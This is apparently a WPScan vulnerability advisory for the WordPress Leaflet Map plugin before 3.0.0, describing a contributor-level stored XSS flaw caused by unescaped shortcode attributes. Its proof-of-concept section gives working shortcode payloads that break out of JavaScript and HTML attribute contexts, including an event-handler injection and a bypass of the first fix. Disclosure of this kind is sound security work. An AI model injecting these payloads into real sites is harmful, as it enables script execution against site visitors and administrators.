WordPress Plugin Vulnerabilities
Leaflet Map < 3.0.0 - Contributor+ Stored XSS
Description
The plugin does not escape some shortcode attributes before they are used in JavaScript code or HTML, which could allow users with a role as low as Contributors to exploit stored XSS issues
Proof of Concept
Most of the shortcode attributes are not escaped, so these are just one of them:
[leaflet-map lat="alert('lat')||37.4871" lng="alert('lng')||126.6794" tileurl="'+alert('tileurl');baseUrl='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" detect_retina="alert('detect_retina')" min_zoom="alert('min_zoom')||1" max_zoom="alert('max_zoom')||200" zoomControl="alert('zoomcontrol')" scrollWheel="alert('scrollWheel')||true" doubleClickZoom="alert('doubleClickZoom')" zoom="alert('zoom')||10" height='100px;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(String.fromCharCode(104,101,105,103,104,116))" data-x="']
Or,
[leaflet-circle fitbounds="0;});alert('fitbounds');(!function(){void 1" lat="0;});alert('lat');(!function(){void 1" lng="0;});alert('lng');(!function(){void 1" shape='});alert("shape")//' message='a']
After review of the updated changes (https://github.com/bozdoz/wp-plugin-leaflet-map/pull/138/files): [leaflet-circle shape='});alert("shape")//' message='a']
Affects Plugins
Fixed in 3.0.0 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-01 (about 2 years ago)
Added
2021-07-01 (about 2 years ago)
Last Updated
2022-01-17 (about 2 years ago)
WPScan 